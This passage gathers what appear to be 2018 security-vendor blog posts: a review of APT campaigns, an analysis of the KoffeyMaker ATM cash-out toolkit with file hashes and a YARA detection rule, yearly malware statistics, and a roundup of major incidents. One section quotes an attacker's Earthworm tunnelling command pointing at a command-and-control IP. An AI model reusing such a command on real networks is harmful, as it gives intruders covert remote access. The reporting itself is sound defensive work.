Finally, and in a very interesting initiative, the US Cyber Command launched an ‘information warfare’ campaign with a message to Russian operatives not to even try influencing the US mid-term election process.

All the above, and several other cases, shows how there seems to be a new doctrine in dealing with such hacking attempts, making them public and providing tools for media campaigns, future negotiations and diplomacy, as well as directly targeting operatives.

On hardware

The closer malware gets to the hardware level, the more difficult it is to detect and delete. This is no easy task for the attackers, as it’s usually difficult to find the exploit chain to get that deep in the system, along with the difficulty in developing reliable malware working in such deep levels. That always raises the question of whether this malware already exists, quietly abusing modern CPU architecture characteristics, and we simply don’t see it.

Recent discoveries of vulnerabilities in different processors open the door to exploits that might be around for years, because replacing the CPU is not something that can be easily done. It is not clear yet how Meltdown/Specter and AMDFlaws among others might be exploited and abused in the future, but attackers don’t really need to rush as these vulnerabilities will probably be around for a long time. Even if we haven’t see them being exploited in the wild yet, we believe this is a very valuable piece of knowledge for attackers and maybe also a timely reminder for us all about how important hardware security is.

That leads on to something we actually saw in the VPNFilter attack, in this case targeting networking devices on a massive scale. This campaign, attributed to a Russian-speaking set of activity, allowed attackers to infect hundreds of thousands of devices, providing control of the network traffic as well as allowing MITM attacks. We saw APT actors abusing network devices in the past but never in such an aggressive way.

On other stuff

Triton/Trisis is an industrial-targeting set of activity that gained popularity during the year as it was discovered in some victims, and is suspected of shutting down an oil refinery in an attack where the actor used a 0-day. According to FireEye, this actor might have Russian origins.

In our predictions we already discussed the possibility of destructive attacks becoming normal in situations where tensions exist between two adversaries, using collateral victims to cause harm and send messages in this dangerous grey zone between an open attack and diplomacy.

Financial attackers may not be using very new techniques, but that may be because they don’t need to. The Carbanak group was ‘beheaded’ with the arrest in Spain of one of their leaders; however, that doesn’t seem to have had any impact on subsequent Fin7 activity during the year. They deployed their new Griffon JavaScript backdoor targeting restaurant chains. Meanwhile, a suspected subset of this group – the CobaltGoblin group – was also very active targeting banks in a more direct way.

KoffeyMaker: notebook vs. ATM

Tue, 12/04/2018 - 07:00

Despite CCTV and the risk of being caught by security staff, attacks on ATMs using a direct connection — so-called black box attacks — are still popular with cybercriminals. The main reason is the low “entry requirements” for would-be cyber-robbers: specialized sites offer both the necessary tools and how-to instructions.

Kaspersky Lab’ experts investigated one such toolkit, dubbed KoffeyMaker, in 2017-2018, when a number of Eastern European banks turned to us for assistance after their ATMs were quickly and almost freely raided. It soon became clear that we were dealing with a black box attack — a cybercriminal opened the ATM, connected a laptop to the cash dispenser, closed the ATM, and left the crime scene, leaving the device inside. Further investigation revealed the “crime instrument” to be a laptop with ATM dispenser drivers and a patched KDIAG tool; remote access was provided through a connection to a USB GPRS modem. The operating system was Windows, most likely XP, ME, or 7 for better driver compatibility.

ATM dispenser connected to a computer without the necessary drivers

The situation then unfolded according to the usual scenario: the cybercriminal returned at the appointed hour and pretended to use the ATM, while an accomplice remotely connected to the hidden laptop, ran the KDIAG tool, and instructed the dispenser to issue banknotes. The attacker took the money and later retrieved the laptop, too. The whole operation could well be done solo, but the scheme whereby a “mule” handles the cash and ATM side, while a second “jackpotter” provides technical support for a share of the loot, is more common. A single ATM can spit out tens of thousands of dollars, and only hardware encryption between an ATM PC and its dispenser can prevent an attack from occurring.

Overall, the attack was reminiscent of Cutlet Maker, which we described last year, except for the software tools. We were able to reproduce all the steps of KoffeyMaker in our test lab. All the required software was found without too much difficulty. Legitimate tools were used to carry out the attack with the exception of the patched KDIAG utility, which Kaspersky Lab products detect as RiskTool.Win32.DIAGK.a. Note that the same version of this program was previously used by cybercriminals from the Carbanak group.

Hash sums

KDIAG, incl. patched files
49c708aad19596cca380fd02ab036eb2
9a587ac619f0184bad123164f2aa97ca
2e90763ac4413eb815c45ee044e13a43
b60e43d869b8d2a0071f8a2c0ce371aa
3d1da9b83fe5ef07017cf2b97ddc76f1
45d4f8b3ed5a41f830f2d3ace3c2b031
f2c434120bec3fb47adce00027c2b35e
8fc365663541241ad626183d6a48882a
6677722da6a071499e2308a121b9051d
a731270f952f654b9c31850e9543f4ad
b925ce410a89c6d0379dc56c85d9daf0
d7b647f5bcd459eb395e8c4a09353f0d
0bcb612e6c705f8ba0a9527598bbf3f3
ae962a624866391a4321c21656737dcb
83ac7fdba166519b29bb2a2a3ab480f8

Drivers
84c29dfad3f667502414e50a9446ed3f
46972ca1a08cfa1506d760e085c71c20
ff3e0881aa352351e405978e066d9796
4ea7a6ca093a9118df931ad7492cfed5
a8da5b44f926c7f7d11f566967a73a32
f046dc9e38024ab15a4de1bbfe830701
9a1a781fed629d1d0444a3ae3b6e2882

YARA rule rule software_zz_patched_KDIAG { meta: author = "Kaspersky Lab" filetype = "PE" date = "2018-04-28" version = "1.0" hash = "49c708aad19596cca380fd02ab036eb2" strings: $b0 = { 25 80 00 00 00 EB 13 FF 75 EC } $b1 = { EB 1F 8D 85 FC FE FF FF 50 68 7B 2F 00 00 } $s0 = "@$MOD$ 040908 0242/0000 CRS1.EXE W32 Copyright (c) Wincor Nixdorf" condition: ( uint16(0) == 0x5A4D and all of ( $s* ) and all of ( $b* ) ) }

Kaspersky Security Bulletin 2018. Statistics

Tue, 12/04/2018 - 05:00

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity. All the statistics were collected from November 2017 to October 2018.

The year in figures
  • 30 .01% of user computers were subjected to at least one Malware-class web attack over the year.
  • Kaspersky Lab solutions repelled 1 876 998 691 attacks launched from online resources located all over the world.
  • 554 159 621 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 21 643 946 unique malicious objects.
  • 765 538 computers of unique users were targeted by encryptors.
  • 5 638 828 computers of unique users were targeted by miners.
  • Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 830 135 devices.

Fill the form below to download the Kaspersky Security Bulletin 2018. Statistics full report (English, PDF):

MktoForms2.loadForm("//app-sj06.marketo.com", "802-IJN-240", 21782);

Kaspersky Security Bulletin 2018. Top security stories

Mon, 12/03/2018 - 05:00

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018

Targeted attack campaigns

At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data centre in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. DanderSpritz contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre respectively, they both allow an attacker to read memory from any process and from its own process respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Brower extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

